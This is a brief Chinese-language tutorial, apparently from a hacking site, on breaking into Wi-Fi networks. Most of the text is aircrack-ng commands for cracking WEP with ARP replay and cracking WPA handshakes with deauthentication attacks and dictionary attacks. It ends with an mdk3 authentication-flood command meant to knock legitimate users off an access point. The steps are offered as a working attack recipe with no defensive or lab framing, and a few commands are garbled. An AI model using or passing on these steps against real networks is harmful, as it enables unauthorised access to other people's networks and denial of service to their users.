|
伪造目标ap,截取合法用户数据包,分析获得wifi密码 灰鸽子官网
00x01 介绍
不管使用什么系统,一定要把网卡激活成为monitor模式,这样软件才可以识别
iwconfig //查看网卡
ifconfig start wlan0 //启动wlan0网卡
airmon-ng start wlan0 //将网卡激活成monitor模式,一般为mon0
WEP
airodump-ng --ivs –w log –c频道wlan0 //wep用ivs过滤报文即可,速度快
aireplay-ng -3 –b bssid –h clientMac mon0 //采用ARPRequesr来迅速加大数据量
aircrack-ng ivs文件 //破解捕获来的ivs文件 wep用这几个命令足以了
WPA/WPA2
airodump-ng –c频道–w log mon0 //wpa正常抓包即可
aireplay-ng -0 3 –a BSSID –c clientMAC wlan0 //发动Deauth攻击获取完整的handshake 提示获取成功,即可破解抓来的数据包
aircrack-ng –w字典文件捕获的cap文件 //WPA破解完全靠字典,需要有耐心
其实说到这里,hash破解速录会大大提升,只是利用字典制作hash table的时候需要花好长的时间,但是破解是aircrack的几十倍.
常见的几种DOS攻击:
Authentication Flood、Deauthentication Flood、Disassociation Flood、RF Jamming、Association Flood等
00x02 利用工具
本次我们还是依赖于BT5下一款强大的工具,mdk3
现在大部分无线下的工具都是利用mdk3为基本内核来开发的,所以其性能就不用多说了.
针对路由器,我们可以发动Authentication Flood,mdk3下参数为a,此攻击是针对无线AP的洪水攻击,
又叫做身份验证攻击.其原理就是向AP发动大量的虚假的链接请求,这种请求数量一旦超过了无线AP所能承受的范围,
AP就会自动断开现有链接,使合法用户无法使用无线网络
mdk3 mon0 a –a AP的MAC地址(BSSID)
黑客
|
|